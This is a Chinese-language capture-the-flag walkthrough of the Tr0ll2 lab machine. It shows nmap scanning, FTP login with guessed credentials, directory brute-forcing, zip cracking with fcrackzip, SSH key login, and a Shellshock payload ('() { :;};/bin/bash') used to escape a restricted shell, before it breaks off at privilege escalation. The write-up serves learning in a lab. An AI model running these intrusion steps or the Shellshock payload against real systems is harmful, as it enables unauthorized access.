【Tr0ll2靶场渗透】
文章目录
一、基础信息
二、信息收集
三、暴力破解
四、SSH登录
五、结语
一、基础信息
nmap -sP 1.168.5.0/24
Kali IP:1.168.5.84
靶机IP:1.168.5.83
二、信息收集
nmap -sS -sV -p- -A 1.168.5.83
开放了21,22,80端口
21端口可尝试匿名登录,口令暴力破解
22端口暴力破解,一般得先收集用户名或密码等信息
80端口就是各种漏洞探测了
目录探测
http://1.168.5.83/robots.txt,查看一下robots.txt文件,可以尝试访问一下路径信息
利用其他工具扫描端口时发现了21端口的banner信息,提到了Tr0ll FTP,也是靶机得名字,可能是用户名
尝试使用口令Tr0ll/Tr0ll登录FTP,发现登录成功
下载下来然后打开需要压缩密码,尝试破解但是没有成功,再尝试找一下信息。
那继续看一下上面得robots文件,给了我们很多路径名,一个个尝试太慢了,下载下来用dirb跑一下
dirb http://1.168.5.83 robots.txt
发现有几个可以访问,尝试一下,均显示为一个图片,但是有些有隐藏内容,这里保存了/dont_bother下的图片
在内容最后看到提示,尝试浏览器访问y0ur_self目录,发现存在一个txt文件
http://1.168.5.83/y0ur_self/answer.txt
发现这里有一个answer.txt,里面全是base64得值,我们先将它下载到本地,然后解码
base64 -d answer.txt > mima.txt
三、暴力破解
可以推测这是一个密码本,因为上面还有个zip文件没打开,进行破解一下
Ziperello工具:用于破解zip压缩包密码,适用于windows
密码:ItCantReallyBeThisEasyRightLOL
Fcrackzip工具:Fcrackzip是一款专门破解zip类型压缩文件密码的工具,工具小巧方便、破解速度快,能使用字典和指定字符集破解,适用于linux、mac osx 系统
fcrackzip -u -D -p mima.txt lmao.zip
然后解压得到noob文件,查看发现是SHA256私钥,猜测可能用来登录ssh
四、SSH登录
ssh -i noob noob@1.168.5.83
发现登陆失败,还需要密码,参考wp:https://www.cnblogs.com/l2sec/p/14414527.html
解决办法:
1、noob需要具有可读可写权限
2、cd ~/.ssh
vim config 没有该文件可直接新建
写入PubkeyAcceptedKeyTypes +ssh-rsa,保存
3、ssh -i noob noob@1.168.5.83 -t '() { :;};/bin/bash'
这里涉及了shellshock漏洞,这是其中一种shell的绕过技术,可自行了解,我也不懂。
看一下suid位权限得文件
find / -perm -4000 2>/dev/null
看到下面几个可疑文件,但是查看了一下看不懂是啥东西
五、结语
一轮查找下来,没发现太多利用的东西,后面查看wp涉及到缓冲区溢出漏洞,太难了,打不下去了,难绷,可自行参考其他wp哦。